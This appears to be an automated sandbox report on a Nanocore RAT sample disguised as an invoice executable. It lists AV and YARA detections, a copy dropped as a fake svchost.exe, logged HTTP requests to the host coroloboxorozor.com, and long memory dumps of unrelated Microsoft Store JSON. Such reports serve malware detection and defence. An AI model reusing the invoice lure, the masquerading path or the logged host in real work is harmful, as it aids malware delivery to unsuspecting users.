Author: vburov: Data: Command: 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 5988, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' , ProcessId: 1284

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe

ReversingLabs: Detection: 29%

Multi AV Scanner detection for submitted file

Show sources

Source: CN-Invoice-XXXXX9808-19011143287989.exe	Virustotal: Detection: 28%			Perma Link
Source: CN-Invoice-XXXXX9808-19011143287989.exe	ReversingLabs: Detection: 29%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 7164, type: MEMORY
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3da9c08.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3d76de8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3da9c08.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3d76de8.5.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Show sources

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:

Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, AdvancedRun.exe, 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000B.00000000.764051839.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr

Networking:

Source: global traffic	HTTP traffic detected: GET /base/EE6EDC43DDDD18D0313D668388B5ECD3.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/563CB4793425B369FD0FAF05E615CF43.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/EE6EDC43DDDD18D0313D668388B5ECD3.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/EE6EDC43DDDD18D0313D668388B5ECD3.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/563CB4793425B369FD0FAF05E615CF43.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/563CB4793425B369FD0FAF05E615CF43.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html HTTP/1.1Host: coroloboxorozor.com

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: GET /base/EE6EDC43DDDD18D0313D668388B5ECD3.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/563CB4793425B369FD0FAF05E615CF43.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/EE6EDC43DDDD18D0313D668388B5ECD3.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/EE6EDC43DDDD18D0313D668388B5ECD3.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/563CB4793425B369FD0FAF05E615CF43.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/563CB4793425B369FD0FAF05E615CF43.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html HTTP/1.1Host: coroloboxorozor.com

Source: svchost.exe, 0000000D.00000003.795855596.0000026432D81000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-02-19T10:50:01.6036639Z\|\|.\|\|b88a9442-a46c-4c16-992a-1cd8e1c09bc0\|\|1152921505693203979\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000D.00000003.795855596.0000026432D81000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-02-19T10:50:01.6036639Z\|\|.\|\|b88a9442-a46c-4c16-992a-1cd8e1c09bc0\|\|1152921505693203979\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000D.00000003.795891183.0000026432D63000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000D.00000003.795891183.0000026432D63000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000D.00000003.780111212.0000026432D6A000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 0000000D.00000003.780111212.0000026432D6A000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 0000000D.00000003.780111212.0000026432D6A000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 0000000D.00000003.780111212.0000026432D6A000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":426163994,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.39.3